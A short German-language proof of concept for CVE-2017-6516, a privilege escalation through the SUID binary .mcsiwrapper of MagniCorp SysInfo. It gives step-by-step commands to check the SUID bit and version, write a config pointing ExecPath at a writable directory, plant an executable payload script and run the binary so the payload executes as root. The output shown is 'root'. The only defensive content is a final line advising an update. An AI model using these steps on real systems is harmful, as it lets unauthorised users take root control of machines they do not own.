
Ein PoC / eine Methodik zum Ausnutzen von CVE-2017-6516
CVE-2017-6516 ist eine Privilegienausweitungsschwachstelle, die auf die Binärdatei .mcsiwrapper von MagniCorp SysInfo unter Version 10-H64 abzielt. Wenn diese Binärdatei das SUID-Bit gesetzt hat und veraltet ist, kann ein Benutzer beliebigen Code als Besitzer der Binärdatei ausführen – was oft root ist.
.mcsiwrapper muss das SUID-Bit gesetzt haben:$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
.mcsiwrapper muss eine Version unter 10-H64 sein:$ .mcsiwrapper --version
<Version under 10-H64>
Erstellen Sie eine Datei config mit folgendem Inhalt:
ExecPath=<Path to a writeable directory>
Erstellen Sie eine ausführbare Payload-Datei im ExecPath-Verzeichnis, zum Beispiel:
#!/bin/sh
whoami
Und machen Sie sie ausführbar:
$ chmod +x payload
Führen Sie den Befehl aus:
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root
Aktualisieren Sie .mcsiwrapper auf mindestens 10-H64.